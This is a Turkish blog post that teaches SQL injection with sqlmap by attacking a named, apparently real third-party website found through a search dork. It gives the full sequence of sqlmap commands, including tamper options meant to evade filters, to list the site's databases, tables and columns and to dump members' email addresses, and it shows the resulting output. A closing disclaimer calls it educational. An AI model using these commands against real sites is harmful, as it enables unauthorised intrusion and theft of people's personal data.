SQLMAP ile Sitenin Veritabanına Erişmek

 Selamlar beyler...
Bugün sizlerle sql nedir , sql sorgusu nasıl yapılır , sqlmap nedir , nasıl sitenin veritabanı (sql) alınır bakacağız , belki bilenleriniz veya duyanlarınız vardır , duymayanlar da öğrensin...

SQL NEDİR?
SQL (Stuructured Query Language)
verinin temel taşlarından biridir.
SQL bir veriyi veritabanına kaydetmeyi ,
Yeni veri eklemeyi ,
Hazır bir veriyi çekmeyi 
Sağlar...
Tabii bunları da bir sorguyla bir sistemle yaparız , Mysql / MS Sql gibi ,
Bunlar sorguyla beraber sitenin veritabanı hakkında işlem yapmayı sağlar.
Normalde internet sitelerinde / sunucularında yöneticilerin daha kolay işlem yapması için geliştirilmiştir.
Ama tabii ki bu sorgu sadece senin bilgisayarında olmaz , eğer hedefte açık varsa uzaktan sorgu yaparsız:
KARŞINIZDA

SQL Injection

SQL Injection
sitede çalışan bir kontrol mekanizmasının kontrol edilmeden sunucuya ulaşması sonucu gerçekleşir.
Mesela bir dork var : inurl:index.php?id=
burada kullanıcı kontrolü basit bir şekilde url yani adres çubuğunda yazan path (yol) ile yapılıyor
mesela: https://samaritermuensingen.ch/index.php?id=2
Bu sitede giden url kontrol edilmiyor bir nevi firewall da yok diyebiliriz belli bir seviyede.
Şimdi ,
beraber uygulamalı olarak yukarıdaki site üzerinde basit bir sql injection yapalım.

İlk olarak sqlmap gerekiyor, Bunun içinde de bilgisayarınızda python kurulu olması lazım.
Eğer python kurulu değilse hemen ya google'dan indirip ya da microsoft store'dan indirebilirsiniz ve kurabilirsiniz.

Python kurulu olduğunu varsayıyorum,
Daha sonra sqlmap'i buradan indirin: https://github.com/sqlmapproject/sqlmap/zipball/master
Şimdi ise o zip içindeki tüm dosyaları sqlmap isminde bir klasör oluşturup onun içine atın.

ASIL KISMA GELDIK...

Şimdi , cmd açın , cd komutlarıyla sqlmap klasörünün içine girin , ve sonra ilk olarak şu komutu çalıştırın:

python sqlmap.py -u "https://samaritermuensingen.ch/index.php?id=2" --dbs --random-agent --tamper="charencode,randomcase" --risk=3

şimdi size sorular soracak y girin ve enterleyın, https://samaritermuensingen.ch/index.php?id=2 adresindeki  sql'i aldıktan sonra , karşınıza [INFO] veya [WARNING] gibi çıktılar olacak onlar bittikten sonra şu karşınıza gelir (database isimleri gelir):

available databases [2]:
[*] information_schema
[*] samariter_1

buradan ben samariter_1 seçtim çünkü kullanıcı bilgileri genelde burada olur info veya information yazan yerde değil.

Sonra şu komut:
python sqlmap.py -u "https://samaritermuensingen.ch/index.php?id=2" -D samariter_1 --tables --random-agent --tamper="randomcase,charencode" --risk=3


Sonra zaten
bu tables dediğimiz kısmı gösterir ben , samu_adr isimli table'ın columnlarına bakacağım.

Komut:
python sqlmap.py -u "https://samaritermuensingen.ch/index.php?id=2" -D samariter_1 -T samu_adr --columns --random-agent --tamper="randomcase,charencode" --risk=3

Şimdi de zaten hani columnları gördük ya ben mail seçtim.

Komut:
python sqlmap.py -u "https://samaritermuensingen.ch/index.php?id=2" -D samariter_1 -T samu_adr -C mail --dump --random-agent --tamper="randomcase,charencode" --risk=3

Böylece mail column'u almış olduk , oranın üyelerinin mailleri...
Ama o mailleri de kötü niyetle kullanmayın , yasal sorumluluk sizde , ben sadece öğrettim.

Siz kurcalayıp daha da öğrenebilirsiniz...

VE AYRICA BANA BIR YORUMU ÇOK GÖRMEYİP YORUM YAZAN ARKADAŞLARA TEŞEKKÜRLER...

iYİ GÜNLER...
Kötüye kullanımdan yazar sorumlu değildir , bu yazı eğitim amaçlıdır , izinsiz denemeyin.





1 yorum: